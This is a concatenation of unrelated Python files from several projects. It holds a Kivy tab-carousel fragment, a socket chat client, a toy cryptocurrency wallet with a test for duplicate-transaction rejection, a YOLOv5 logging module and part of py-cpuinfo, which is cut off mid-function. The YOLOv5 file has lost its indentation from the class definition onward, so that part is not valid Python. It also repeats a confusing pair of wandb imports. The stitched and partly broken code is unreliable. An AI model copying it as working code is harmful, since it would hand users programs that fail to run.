        self.current_tab.state = "normal"
        header.state = 'down'
        self._current_tab = header
        # set the carousel to load the appropriate slide
        # saved in the screen attribute of the tab head
        slide = carousel.slides[header.slide]
        if carousel.current_slide != slide:
            carousel.current_slide.dispatch('on_leave')
            carousel.load_slide(slide)
            slide.dispatch('on_enter')

    def add_widget(self, widget, index=0):
        # CScreen children become carousel slides; anything else goes to
        # the TabbedPanel as usual.
        if isinstance(widget, Factory.CScreen):
            self.carousel.add_widget(widget)
            return
        super(TabbedCarousel, self).add_widget(widget, index=index)
|
client.py | import socket
import threading
import time
# Create constants
HEADER = 64  # fixed width (bytes) of the length-prefix field
PORT = 5050
FORMAT = 'utf-8'
DC_MSG = "!DISCONNECT"  # sentinel message telling the server we're leaving
SERVER = "localhost"
ADDR = (SERVER, PORT)
# Set up client var and connect to the server (side effect at import time)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(ADDR)
# ANSI escape: move the cursor up one line and clear it (prompt redraw).
erase = '\x1b[1A\x1b[K'
# Handles sending a message to the server
def send(sendMsg):
    """Send one length-prefixed message to the server.

    The text is encoded, then its byte length is transmitted first in a
    fixed-size (HEADER bytes) space-padded field so the receiver knows
    how much payload to read.
    """
    # Encode and create header
    message = sendMsg.encode(FORMAT)
    msg_len = len(message)
    send_len = str(msg_len).encode(FORMAT)
    send_len += b' ' * (HEADER - len(send_len))
    # Bug fix: socket.send() may transmit only part of the buffer;
    # sendall() retries until every byte is written.
    client.sendall(send_len)
    # Send the actual text
    client.sendall(message)
# A thread to handle receiving messages broadcast from the server
def recvThread():
    """Background thread: print messages broadcast by the server.

    Reads the fixed-size length header, then reads exactly that many
    payload bytes. A single recv() call may return fewer bytes than
    requested (or b'' at EOF), so both reads loop until complete.
    """
    def _recv_exact(n):
        # Accumulate until n bytes arrive; an empty chunk means the
        # server closed the connection.
        buf = b''
        while len(buf) < n:
            chunk = client.recv(n - len(buf))
            if not chunk:
                raise ConnectionError("server closed the connection")
            buf += chunk
        return buf
    try:
        # Wait for a message from the server and then decode and print it, while keeping the prompt on the same line
        while True:
            msg_len = _recv_exact(HEADER).decode(FORMAT).strip()
            if msg_len:
                recvMsg = _recv_exact(int(msg_len)).decode(FORMAT)
                print(f"\n{erase}{recvMsg}\n[{uname}]: ", end="")
    except Exception as e:
        # Exit quietly when the socket is closed during shutdown.
        return e
# Main thread
disconnected = False  # True once DC_MSG has been sent by the user
try:
    # Send initial message to set up username
    uname = input("Enter a username: ")
    send(uname)
    # Start handling received messages
    RECVTHREAD = threading.Thread(target=recvThread)
    RECVTHREAD.start()
    # Handle the prompt and sending messages
    while True:
        msg = input(f"[{uname}]: ")
        send(msg)
        print("\x1b[A\x1b[K", end="")
        if msg == DC_MSG:
            disconnected = True
            break
# Clean up whether the loop ended normally or via ctrl+c.
finally:
    # Bug fix: the original unconditionally re-sent DC_MSG here, so
    # typing it in the loop disconnected twice.
    if not disconnected:
        send(DC_MSG)
    time.sleep(0.5)
    client.close()
    print("\ngoodbye")
    exit()
|
Wallet.py | #Wallet
import SocketUtils
import Transactions
import TxBlock
import pickle
import Signatures
# Known chain heads (forks); populated/maintained by walletServer().
head_blocks = [None]
# Addresses of the wallet server and the miner servers on this host.
wallets = [('localhost',5006)]
miners = [('localhost',5005),('localhost',5007)]
break_now = False  # set by StopAll() to terminate server loops
verbose = True
my_private,my_public = Signatures.generate_keys()
# Per-public-key count of sent transactions (acts as a replay nonce).
tx_index = {}
def StopAll():
    """Signal the wallet server loop in this module to exit."""
    global break_now
    break_now = True
def walletServer(my_addr):
    """Run the wallet's block-receiving server loop until StopAll().

    Loads the saved chain (falling back to the genesis block) and the
    per-key transaction index, then accepts TxBlock objects from miners
    and merges them into head_blocks. On shutdown the chain and the
    index are persisted to disk.

    NOTE(review): my_addr is ignored -- the listen port is hard-coded
    to 5006 below; confirm whether it should use my_addr instead.
    """
    global head_blocks
    global tx_index
    try:
        head_blocks = TxBlock.loadBlocks("AllBlocks.dat")
    except Exception:
        # No saved chain yet: start from the genesis block.
        head_blocks = TxBlock.loadBlocks("GenesisBlock.dat")
    try:
        # `with` guarantees the file is closed even if unpickling fails
        # (the original leaked the handle on error).
        with open("tx_index.dat", "rb") as fp:
            tx_index = pickle.load(fp)
    except (OSError, EOFError, pickle.PickleError):
        # Missing or corrupt index file: start with an empty index.
        tx_index = {}
    server = SocketUtils.newServerConnection('localhost', 5006)
    while not break_now:
        newBlock = SocketUtils.recvObj(server)
        if isinstance(newBlock, TxBlock.TxBlock):
            TxBlock.processNewBlock(newBlock, head_blocks)
    server.close()
    TxBlock.saveBlocks(head_blocks, "AllBlocks.dat")
    # Persist the tx index so per-key nonces survive restarts.
    with open("tx_index.dat", "wb") as fp:
        pickle.dump(tx_index, fp)
    return True
def getBalance(pu_key):
    """Return pu_key's balance computed along the longest known chain."""
    long_chain = TxBlock.findLongestBlockchain(head_blocks)
    return TxBlock.getBalance(pu_key,long_chain)
def sendCoins(pu_send, amt_send, pr_send, pu_recv, amt_recv):
    """Build, sign and broadcast a one-input/one-output Tx to all miners.

    The difference between amt_send and amt_recv is left as the miner fee.
    Each sender key carries a running index (nonce) so otherwise identical
    transactions remain distinguishable.
    """
    global tx_index
    newTx = Transactions.Tx()
    # First transaction from this key starts at index 0.
    tx_index.setdefault(pu_send, 0)
    newTx.add_input(pu_send, amt_send, tx_index[pu_send])
    newTx.add_output(pu_recv, amt_recv)
    newTx.sign(pr_send)
    for ip, port in miners:
        SocketUtils.sendObj(ip, newTx, port)
    # Bump the per-key nonce for the next transaction.
    tx_index[pu_send] += 1
    return True
def WalletStart():
    """Placeholder for wallet start-up (not yet implemented)."""
    #Load head_blocks, private and public keys
    #Load miner list
    #TODO load address book
    #Start walletServer
    return True
def WalletStop():
    """Placeholder for wallet shutdown (not yet implemented)."""
    #Save head_blocks
    #Close threads
    return True
if __name__ == "__main__":
    # Integration test: spin up a miner, the wallet server and a "thief"
    # relay, move coins around, then verify balances, duplicate-Tx
    # rejection and forged-block handling.
    import time
    import Miner
    import threading
    import Signatures

    def Thief(my_addr):
        """Malicious relay: re-broadcasts every Tx it receives to the
        other miners, attempting to get transactions processed twice."""
        my_ip, my_port = my_addr
        server = SocketUtils.newServerConnection(my_ip, my_port)
        # Get Txs from wallets
        while not break_now:
            newTx = SocketUtils.recvObj(server)
            if isinstance(newTx, Transactions.Tx):
                for ip, port in miners:
                    if not (ip == my_ip and port == my_port):
                        SocketUtils.sendObj(ip, newTx, port)

    Miner.saveTxList([], "Txs.dat")
    miner_pr, miner_pu = Signatures.generate_keys()
    t1 = threading.Thread(target=Miner.minerServer, args=(('localhost', 5005),))
    t2 = threading.Thread(target=Miner.nonceFinder, args=(wallets, miner_pu))
    t3 = threading.Thread(target=walletServer, args=(('localhost', 5006),))
    t1.start()
    t3.start()
    pr1, pu1 = Signatures.loadKeys("private.key", "public.key")
    pr2, pu2 = Signatures.generate_keys()
    pr3, pu3 = Signatures.generate_keys()
    # Query balances
    bal1 = getBalance(pu1)
    print(bal1)
    bal2 = getBalance(pu2)
    bal3 = getBalance(pu3)
    # Send coins (loops replace the original copy-pasted call lists):
    # 10 x (0.1 in, 0.1 out) -> pu2 and 10 x (0.1 in, 0.03 out) -> pu3.
    for _ in range(10):
        sendCoins(pu1, 0.1, pr1, pu2, 0.1)
    for _ in range(10):
        sendCoins(pu1, 0.1, pr1, pu3, 0.03)
    t2.start()
    time.sleep(60)
    # Save/Load all blocks
    TxBlock.saveBlocks(head_blocks, "AllBlocks.dat")
    head_blocks = TxBlock.loadBlocks("AllBlocks.dat")
    # Query balances
    new1 = getBalance(pu1)
    print(new1)
    new2 = getBalance(pu2)
    new3 = getBalance(pu3)
    # Verify balances: pu1 spent 2.0 in total, pu2 gained 1.0, pu3 gained 0.3.
    if abs(new1-bal1+2.0) > 0.00000001:
        print("Error! Wrong balance for pu1")
    else:
        print("Success. Good balance for pu1")
    if abs(new2-bal2-1.0) > 0.00000001:
        print("Error! Wrong balance for pu2")
    else:
        print("Success. Good balance for pu2")
    if abs(new3-bal3-0.3) > 0.00000001:
        print("Error! Wrong balance for pu3")
    else:
        print("Success. Good balance for pu3")
    # Thief will try to duplicate transactions
    # NOTE(review): miners already contains ('localhost', 5007) at module
    # level, so this append duplicates the entry -- confirm intended.
    miners.append(('localhost', 5007))
    t4 = threading.Thread(target=Thief, args=(('localhost', 5007),))
    t4.start()
    sendCoins(pu2, 0.2, pr2, pu1, 0.2)
    time.sleep(20)
    # Check balances: pu1 must gain exactly 0.2, not 0.4.
    newnew1 = getBalance(pu1)
    print(newnew1)
    if abs(newnew1 - new1 - 0.2) > 0.000000001:
        print("Error! Duplicate Txs accepted.")
    else:
        print("Success! Duplicate Txs rejected.")
    Miner.StopAll()
    t1.join()
    t2.join()
    # Forged block: a block whose parent is two back must become a new
    # branch head rather than replace the current chain tip.
    num_heads = len(head_blocks)
    minus_two = head_blocks[0].previousBlock.previousBlock
    newB = TxBlock.TxBlock(minus_two)
    newB.previousBlock = None
    SocketUtils.sendObj('localhost', newB, 5006)
    time.sleep(4)
    if len(head_blocks) != num_heads + 1:
        print("Error! Branch block should be head")
    if head_blocks[-1].previousBlock != minus_two:
        print("Error! Branch block has wrong parent")
    StopAll()
    t3.join()
    print("Exit successful.")
|
__init__.py | # YOLOv5 experiment logging utils
import warnings
from threading import Thread
import torch
from torch.utils.tensorboard import SummaryWriter
from ...utils.general import colorstr, emojis
from ...utils.loggers.wandb.wandb_utils import WandbLogger
from ...utils.plots import plot_images, plot_results
from ...utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb') # text-file, TensorBoard, Weights & Biases
# W&B availability probe. The plain `import wandb` checks the package is
# installed; `from . import wandb` then binds the local wandb helper
# sub-package; the assert rejects the case where a stray local `wandb`
# directory shadowed the real package.
try:
    import wandb
    from . import wandb

    assert hasattr(wandb, '__version__')  # verify package import not local dir
except (ImportError, AssertionError):
    # Fix: dropped the leftover debug print ('#...#3' spam) from the
    # failure path; callers simply test `if wandb`.
    wandb = None
class Loggers():
# YOLOv5 Loggers class
def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, data_dict=None, logger=None, include=LOGGERS):
    """Store run state and create an empty slot for each backend in LOGGERS."""
    self.save_dir = save_dir
    self.weights = weights
    self.opt = opt
    self.hyp = hyp
    self.data_dict = data_dict
    self.logger = logger  # for printing results to console
    self.include = include
    for k in LOGGERS:
        setattr(self, k, None)  # init empty logger dictionary
def start(self):
    """Initialise the enabled logging backends and return self.

    CSV logging is always on; TensorBoard and W&B are enabled only when
    requested via ``include`` and their preconditions hold.
    """
    self.csv = True  # always log to csv
    # Message: tell the user how to get W&B if it is not installed.
    try:
        import wandb
        from . import wandb
    except ImportError:
        prefix = colorstr('Weights & Biases: ')
        s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
        print(emojis(s))
    # TensorBoard
    s = self.save_dir
    if 'tb' in self.include and not self.opt.evolve:
        prefix = colorstr('TensorBoard: ')
        self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
        self.tb = SummaryWriter(str(s))
    # W&B
    try:
        assert 'wandb' in self.include and wandb
        run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume else None
        self.opt.hyp = self.hyp  # add hyperparameters
        self.wandb = WandbLogger(self.opt, s.stem, run_id, self.data_dict)
    except Exception:
        # Fix: was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit; any backend failure just
        # disables W&B logging.
        self.wandb = None
    return self
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots):
from wandb import Image
# Callback runs on train batch end
if plots:
if ni == 0:
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
if ni < 3:
f = self.save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob('train*.jpg'))
self.wandb.log({'Mosaics': [Image(str(f), caption=f.name) for f in files if f.exists()]})
def on_train_epoch_end(self, epoch):
# Callback runs on train epoch end
if self.wandb:
self.wandb.current_epoch = epoch + 1
def on_val_batch_end(self, pred, predn, path, names, im):
# Callback runs on train batch end
if self.wandb:
self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
from wandb import Image
# Callback runs on val end
if self.wandb:
files = sorted(self.save_dir.glob('val*.jpg'))
self.wandb.log({"Validation": [Image(str(f), caption=f.name) for f in files]})
def on_train_val_end(self, mloss, results, lr, epoch, best_fitness, fi):
# Callback runs on val end during training
vals = list(mloss) + list(results) + lr
keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', # metrics
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
x = {k: v for k, v in zip(keys, vals)} # dict
if self.csv:
file = self.save_dir / 'results.csv'
n = len(x) + 1 # number of cols
s = '' if file.exists() else (('%20s,' * n % tuple(['epoch'] + keys)).rstrip(',') + '\n') # add header
with open(file, 'a') as f:
f.write(s + ('%20.5g,' * n % tuple([epoch] + vals)).rstrip(',') + '\n')
if self.tb:
for k, v in x.items():
self.tb.add_scalar(k, v, epoch) # TensorBoard
if self.wandb:
self.wandb.log(x)
self.wandb.end_epoch(best_result=best_fitness == fi)
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
# Callback runs on model save event
if self.wandb:
if ((epoch + 1) % self.opt.save_period == 0 and not final_epoch) and self.opt.save_period != -1:
self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)
def on_train_end(self, last, best, plots):
# Callback runs on training end
from wandb import Image, log, log_artifact
if plots:
plot_results(dir=self.save_dir) # save results.png
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
files = [(self.save_dir / f) for f in files if (self.save_dir / f).exists()] # filter
if self.wandb:
log({"Results": [Image(str(f), caption=f.name) for f in files]})
log_artifact(str(best if best.exists() else last), type='model',
name='run_' + self.wandb.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
self.wandb.finish_run()
def log_images(self, paths):
# Log images
import wandb
from . import wandb
from wandb import Image
if self.wandb:
self.wandb.log({"Labels": [Image(str(x), caption=x.name) for x in paths]})
|
cpuinfo.py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# source: https://github.com/workhorsy/py-cpuinfo/blob/v4.0.0/cpuinfo/cpuinfo.py
# version: 4.0.0
# date: 2018-05-05
# Copyright (c) 2014-2018, Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (4, 0, 0)
import os, sys
import glob
import re
import time
import platform
import multiprocessing
import ctypes
import pickle
import base64
import subprocess
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
PY2 = sys.version_info[0] == 2  # True when running under Python 2

# Load hacks for Windows
if platform.system().lower() == 'windows':
    # Monkey patch multiprocessing's Popen to fork properly on Windows Pyinstaller
    # https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
    # The forking module moved/renamed across Python versions, so try the
    # modern name first and fall back to progressively older ones.
    try:
        import multiprocessing.popen_spawn_win32 as forking
    except ImportError as err:
        try:
            import multiprocessing.popen_fork as forking
        except ImportError as err:
            import multiprocessing.forking as forking

    class _Popen(forking.Popen):
        # Popen replacement that restores the PyInstaller _MEIPASS2 env var
        # around child-process creation so --onefile children can boot.
        def __init__(self, *args, **kw):
            if hasattr(sys, 'frozen'):
                # We have to set original _MEIPASS2 value from sys._MEIPASS
                # to get --onefile mode working.
                os.putenv('_MEIPASS2', sys._MEIPASS)
            try:
                super(_Popen, self).__init__(*args, **kw)
            finally:
                if hasattr(sys, 'frozen'):
                    # On some platforms (e.g. AIX) 'os.unsetenv()' is not
                    # available. In those cases we cannot delete the variable
                    # but only set it to the empty string. The bootloader
                    # can handle this case.
                    if hasattr(os, 'unsetenv'):
                        os.unsetenv('_MEIPASS2')
                    else:
                        os.putenv('_MEIPASS2', '')

    forking.Popen = _Popen
class DataSource(object):
    """Static facade over every OS-level probe py-cpuinfo consults.

    The has_*() predicates report whether a given information source exists
    on this machine; the remaining helpers run the corresponding command or
    registry query and return its raw result.
    """

    bits = platform.architecture()[0]
    cpu_count = multiprocessing.cpu_count()
    is_windows = platform.system().lower() == 'windows'
    raw_arch_string = platform.machine()
    can_cpuid = True

    @staticmethod
    def has_proc_cpuinfo():
        return os.path.exists('/proc/cpuinfo')

    @staticmethod
    def has_dmesg():
        return bool(program_paths('dmesg'))

    @staticmethod
    def has_var_run_dmesg_boot():
        uname = platform.system().strip().strip('"').strip("'").strip().lower()
        return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')

    @staticmethod
    def has_cpufreq_info():
        return bool(program_paths('cpufreq-info'))

    @staticmethod
    def has_sestatus():
        return bool(program_paths('sestatus'))

    @staticmethod
    def has_sysctl():
        return bool(program_paths('sysctl'))

    @staticmethod
    def has_isainfo():
        return bool(program_paths('isainfo'))

    @staticmethod
    def has_kstat():
        return bool(program_paths('kstat'))

    @staticmethod
    def has_sysinfo():
        return bool(program_paths('sysinfo'))

    @staticmethod
    def has_lscpu():
        return bool(program_paths('lscpu'))

    @staticmethod
    def has_ibm_pa_features():
        return bool(program_paths('lsprop'))

    @staticmethod
    def has_wmic():
        rc, output = run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
        return rc == 0 and len(output) > 0

    @staticmethod
    def cat_proc_cpuinfo():
        return run_and_get_stdout(['cat', '/proc/cpuinfo'])

    @staticmethod
    def cpufreq_info():
        return run_and_get_stdout(['cpufreq-info'])

    @staticmethod
    def sestatus_allow_execheap():
        return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execheap"'])[1].strip().lower().endswith('on')

    @staticmethod
    def sestatus_allow_execmem():
        return run_and_get_stdout(['sestatus', '-b'], ['grep', '-i', '"allow_execmem"'])[1].strip().lower().endswith('on')

    @staticmethod
    def dmesg_a():
        return run_and_get_stdout(['dmesg', '-a'])

    @staticmethod
    def cat_var_run_dmesg_boot():
        return run_and_get_stdout(['cat', '/var/run/dmesg.boot'])

    @staticmethod
    def sysctl_machdep_cpu_hw_cpufrequency():
        return run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])

    @staticmethod
    def isainfo_vb():
        return run_and_get_stdout(['isainfo', '-vb'])

    @staticmethod
    def kstat_m_cpu_info():
        return run_and_get_stdout(['kstat', '-m', 'cpu_info'])

    @staticmethod
    def sysinfo_cpu():
        return run_and_get_stdout(['sysinfo', '-cpu'])

    @staticmethod
    def lscpu():
        return run_and_get_stdout(['lscpu'])

    @staticmethod
    def ibm_pa_features():
        prop_files = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
        if prop_files:
            return run_and_get_stdout(['lsprop', prop_files[0]])
        # falls through to an implicit None when the property is absent

    @staticmethod
    def wmic_cpu():
        return run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])

    @staticmethod
    def winreg_processor_brand():
        cpu_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
        brand = winreg.QueryValueEx(cpu_key, "ProcessorNameString")[0]
        winreg.CloseKey(cpu_key)
        return brand

    @staticmethod
    def winreg_vendor_id():
        cpu_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
        vendor = winreg.QueryValueEx(cpu_key, "VendorIdentifier")[0]
        winreg.CloseKey(cpu_key)
        return vendor

    @staticmethod
    def winreg_raw_arch_string():
        env_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment")
        arch = winreg.QueryValueEx(env_key, "PROCESSOR_ARCHITECTURE")[0]
        winreg.CloseKey(env_key)
        return arch

    @staticmethod
    def winreg_hz_actual():
        cpu_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
        mhz = winreg.QueryValueEx(cpu_key, "~Mhz")[0]
        winreg.CloseKey(cpu_key)
        return to_hz_string(mhz)

    @staticmethod
    def winreg_feature_bits():
        cpu_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
        features = winreg.QueryValueEx(cpu_key, "FeatureSet")[0]
        winreg.CloseKey(cpu_key)
        return features
def obj_to_b64(thing):
    """Serialize *thing* with pickle and return it as base64 text (utf8 str)."""
    return base64.b64encode(pickle.dumps(thing)).decode('utf8')
def b64_to_obj(thing):
    """Inverse of obj_to_b64: base64-decode *thing* and unpickle the result.

    Returns {} when *thing* is not valid base64 or not a valid pickle.
    WARNING: pickle.loads can execute arbitrary code -- only feed this data
    produced by obj_to_b64 on a trusted machine, never external input.
    """
    try:
        return pickle.loads(base64.b64decode(thing))
    except Exception:  # narrowed from a bare except (kept SystemExit/KeyboardInterrupt alive)
        return {}
def run_and_get_stdout(command, pipe_command=None):
    """Run *command*, optionally piping its stdout into *pipe_command*.

    Both commands are argument lists (shell=False).  Returns a
    (returncode, stdout) tuple for the last process in the chain; stdout is
    decoded as UTF-8 on Python 3 and left as bytes on Python 2.
    """
    first = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    if pipe_command:
        last = subprocess.Popen(pipe_command, stdin=first.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        first.stdout.close()  # let the first process receive SIGPIPE if the second exits early
    else:
        last = first
    output = last.communicate()[0]
    if not PY2:
        output = output.decode(encoding='UTF-8')
    return last.returncode, output
def program_paths(program_name):
    """Return every executable on the PATH matching *program_name*.

    On Windows each PATHEXT extension (e.g. '.EXE') is also tried appended
    to the bare name.  Returns [] when nothing matches or PATH is unset.
    """
    paths = []
    # Must be a list, not the lazy filter() iterator the original used -- an
    # iterator is exhausted after the first PATH entry, so PATHEXT matches in
    # every later directory were silently missed.  (Also removed an unused
    # `path` local and made a missing PATH a no-match instead of a KeyError.)
    exts = [e for e in os.environ.get('PATHEXT', '').split(os.pathsep) if e]
    for directory in os.environ.get('PATH', '').split(os.pathsep):
        candidate = os.path.join(directory, program_name)
        if os.access(candidate, os.X_OK):
            paths.append(candidate)
        for ext in exts:
            with_ext = candidate + ext
            if os.access(with_ext, os.X_OK):
                paths.append(with_ext)
    return paths
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
def _get_hz_string_from_brand(processor_brand):
    """Pull the clock speed out of a brand string like '... CPU @ 2.40GHz'.

    Returns (scale, hz) where hz is a decimal string and scale the power of
    ten it is expressed in (9 for GHz, 6 for MHz, 1 when unknown).  Returns
    (1, '0.0') when the brand string carries no frequency at all.
    """
    lowered = processor_brand.lower()

    # Just return 0 if the processor brand does not have the Hz
    if 'hz' not in lowered:
        return (1, '0.0')

    scale = 9 if lowered.endswith('ghz') else 6 if lowered.endswith('mhz') else 1

    # The number is either after an '@' separator or the last token
    hz = lowered.split('@')[1] if '@' in lowered else lowered.rsplit(None, 1)[1]
    hz = hz.rstrip('mhz').rstrip('ghz').strip()
    return (scale, to_hz_string(hz))
def to_friendly_hz(ticks, scale):
    """Format a decimal-string frequency as a human string like '2.4000 GHz'.

    *ticks* is a decimal string (e.g. '2.4') and *scale* the power-of-ten
    exponent attached to it; both are first normalised through to_raw_hz.
    """
    # Get the raw Hz as a string
    left, right = to_raw_hz(ticks, scale)
    ticks = '{0}.{1}'.format(left, right)

    # Get the location of the dot, and remove said dot
    dot_index = ticks.index('.')
    ticks = ticks.replace('.', '')

    # Get the Hz symbol and scale (dot position == number of integer digits)
    symbol = "Hz"
    scale = 0
    if dot_index > 9:
        symbol = "GHz"
        scale = 9
    elif dot_index > 6:
        symbol = "MHz"
        scale = 6
    elif dot_index > 3:
        symbol = "KHz"
        scale = 3

    # Get the Hz with the dot at the new scaled point
    ticks = '{0}.{1}'.format(ticks[:-scale-1], ticks[-scale-1:])

    # Format the ticks to have 4 numbers after the decimal
    # and remove any superfluous zeroes.
    ticks = '{0:.4f} {1}'.format(float(ticks), symbol)
    # NOTE(review): this rstrip is a no-op -- the string now ends with the
    # unit symbol (e.g. 'GHz'), never '0', so trailing zeroes survive.
    # Fixing it would change the public output format, so it is left as-is.
    ticks = ticks.rstrip('0')

    return ticks
def to_raw_hz(ticks, scale):
    """Shift the decimal string *ticks* left by *scale* digits.

    Returns (integer_part, fractional_part) as ints, e.g.
    to_raw_hz('2.4', 9) == (2400000000, 0).
    """
    digits = ticks.lstrip('0')
    dot_at = digits.index('.')
    # Drop the dot and zero-pad so the shifted split point always exists
    digits = digits.replace('.', '').ljust(scale + dot_at + 1, '0')
    split_at = dot_at + scale
    whole, frac = digits[:split_at], digits[split_at:]
    return (int(whole), int(frac))
def to_hz_string(ticks):
    """Normalise a number (or numeric string) to a canonical decimal string.

    Guarantees exactly one '.' with at least one digit after it and no
    superfluous trailing zeroes: 2400 -> '2400.0', '2.40' -> '2.4'.
    """
    text = '{0}'.format(ticks)
    if '.' not in text:
        text = '{0}.0'.format(text)
    text = text.rstrip('0')
    if text.endswith('.'):
        text += '0'
    return text
def to_friendly_bytes(input):
    """Expand a terse size like '256K' into '256 KB'; pass anything else through.

    Falsy inputs (None, '', 0) are returned unchanged; unrecognised values
    come back as their string form.
    """
    if not input:
        return input

    text = "{0}".format(input)
    suffix_map = (
        (r"^[0-9]+B$", 'B'),
        (r"^[0-9]+K$", 'KB'),
        (r"^[0-9]+M$", 'MB'),
        (r"^[0-9]+G$", 'GB'),
    )
    for pattern, friendly_size in suffix_map:
        if re.match(pattern, text):
            return "{0} {1}".format(text[ : -1].strip(), friendly_size)
    return text
def _parse_cpu_string(cpu_string):
    """Parse one dmesg CPU banner such as
    'Intel(R) ... CPU @ 2.40GHz (Origin="GenuineIntel", Fam=0x6, ...)'.

    Returns (processor_brand, hz_brand, scale, vendor_id, stepping, model,
    family); the last four are None when no trailing '(...)' field list is
    present or it cannot be parsed.
    """
    # Get location of fields at end of string (the '(' after the '@')
    fields_index = cpu_string.find('(', cpu_string.find('@'))

    # Processor Brand
    processor_brand = cpu_string
    if fields_index != -1:
        processor_brand = cpu_string[0 : fields_index].strip()

    fields = None
    if fields_index != -1:
        fields = cpu_string[fields_index : ]

    # Hz
    scale, hz_brand = _get_hz_string_from_brand(processor_brand)

    # Various fields
    vendor_id, stepping, model, family = (None, None, None, None)
    if fields:
        try:
            fields = fields.rsplit('(', 1)[1].split(')')[0].split(',')
            fields = [f.strip().lower() for f in fields]
            fields = [f.split(':') for f in fields]
            fields = [{f[0].strip() : f[1].strip()} for f in fields]
            for field in fields:
                name = list(field.keys())[0]
                value = list(field.values())[0]
                if name == 'origin':
                    vendor_id = value.strip('"')
                elif name == 'stepping':
                    # int(value, 16) accepts both '0xf' and 'f'.  The old
                    # value.lstrip('0x') corrupted values because lstrip
                    # strips a character *set*, not a prefix ('0x0' -> '').
                    stepping = int(value, 16)
                elif name == 'model':
                    model = int(value, 16)
                elif name in ['fam', 'family']:
                    family = int(value, 16)
        except Exception:  # malformed field list: keep whatever was parsed before the failure
            pass

    return (processor_brand, hz_brand, scale, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
    """Extract CPU info from raw dmesg text (BSD-style boot banners).

    Scans for 'CPU:'/'CPU0:'/'CPU1:' banner lines, keeps the most complete
    one, then folds in 'Origin=...' fields and 'Features='/'AMD Features='
    flag lists.  Returns a dict which may contain vendor_id, brand,
    stepping, model, family, flags, hz_advertised(_raw) and hz_actual(_raw);
    returns {} when nothing parseable is found or parsing fails.
    """
    try:
        # Get all the dmesg lines that might contain a CPU string
        lines = output.split(' CPU0:')[1:] + \
